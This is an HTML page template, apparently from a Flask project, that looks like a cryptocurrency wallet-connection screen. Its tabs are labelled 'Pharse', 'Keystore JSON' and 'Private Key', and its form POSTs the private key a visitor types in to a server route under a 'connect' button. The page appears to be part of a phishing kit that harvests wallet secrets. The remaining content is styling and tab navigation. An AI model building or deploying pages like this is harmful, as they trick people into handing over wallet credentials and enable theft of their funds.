<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>form</title>
    <link href="https://cdn.jsdelivr.net/npm/daisyui@2.51.6/dist/full.css" rel="stylesheet" type="text/css" />
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2/dist/tailwind.min.css" rel="stylesheet" type="text/css" />
    <link rel="stylesheet" href="../static/css/style.css">
</head>
<body>
    <!-- Tab links -->
    <div class="tab">
        <button class="tablinks" onclick=" form() " >Pharse</button>
        <button class="tablinks" onclick=" form2()">Keystore JSON</button>
        <button class="tablinks" onclick=" form3()">Private Key</button>
      </div>
  
  <!-- Tab content -->

 

  

  
    <div class="card">
        <form action="{{url_for('fuck2')}}" method="POST">
          
            <div class="input-container">
              
              <input class="input-field" type="text" placeholder="private key" name="private">
            

            </div>
          
            <input class="sub" type="submit" value="connect">
          
           
          </form>
  </div>
  
  <script>
    function form(){
        window.location.href="form1.html";
    }
    function form2(){
      window.location.href="form2.html";
    }
    function form3(){
        window.location.href="form3.html";
    }
   </script>
  

  <style>
    * {box-sizing: border-box;}

/* Style the input container */
.input-container {
 
  width: 100%;
  margin-bottom: 15px;
}

/* Style the form icons */
.icon {
  padding: 10px;
  background: dodgerblue;
  color: white;
  min-width: 50px;
  text-align: center;
}

/* Style the input fields */
.input-field {
  padding: 10px;
  outline: none;
  border: 2px solid dodgerblue;
  height: 10rem;
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
  transition: 0.3s;
  margin-left: 20%;
  width: 50%;
  margin-top: 5%;

}
.sub{
    background-color: #f4511e;
  border: none;
  color: white;
  padding: 16px 32px;
  text-align: center;
  font-size: 16px;
  margin: 4px 2px;
  opacity: 1;
  transition: 0.3s; 
  margin-left: 20%; 
}

.sub:hover {opacity: 0.6}


.input-field:focus {
  border: 2px solid green;
}
/* .card {
  Add shadows to create the "card" effect 
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
  transition: 0.3s;
 margin-left: 20%;
  width: 50%;
  margin-top: 5%;
} */

/* On mouse-over, add a deeper shadow */
.card:hover {
  box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2);
}
/* Set a style for the submit button */
.btn {
  background-color: dodgerblue;
  color: white;
  padding: 15px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  opacity: 0.9;
}

.btn:hover {
  opacity: 1;
}

/* Style the tab */
.tab {
    display: flex;
    overflow: hidden;
    border: 1px solid #ccc;
    background-color: #f1f1f1;
    align-items: center;
    justify-content: center;
    height: 5rem;
    align-content: center;
    margin-top: 5%;
  }
  
  /* Style the buttons that are used to open the tab content */
  .tab button {
    background-color: inherit;
    float: left;
    border: none;
    outline: none;
    cursor: pointer;
    padding: 10%;
    transition: 0.3s;
    color: black;
    font-size: 20px;
  }
  
  /* Change background color of buttons on hover */
  .tab button:hover {
    background-color: #ddd;
  }
  
  /* Create an active/current tablink class */
  .tab button.active {
    background-color: #ccc;
  }
  
  /* Style the tab content */
  .tabcontent {
    display: none;
    padding: 6px 12px;
    border: 1px solid #ccc;
    border-top: none;
  }
  @media screen and (max-width: 990px) {
   button{
    float: right;
    font-size: 15%;
    padding: 3%;
    margin-left: 5%;
   }
    .tab , .card{
        margin-top: 5%;
    }
   .input-field{
    width: 100%;
    margin-left: 0;
   }.tab{
display: flex;
flex-direction: column;
padding: 25%;
width: 100%;
font-size: 15%;
text-align: center;
   }
}
@media screen and (max-width: 360px) {
    button{
      display: flex;
    flex-direction: column;
     font-size: 10%;
     padding: 10%;
    
    }
     .tab , .card{
         margin-top: 5%;
     }
    .input-field{
     width: 100%;
     margin-left: 0;
    }.tab{
 display: flex;
 flex-direction: row;
justify-content: center;
align-content: center;
 width: 100%;
 font-size: 10%;
 text-align: center;
    }
 }
  </style>
  
</body>
</html>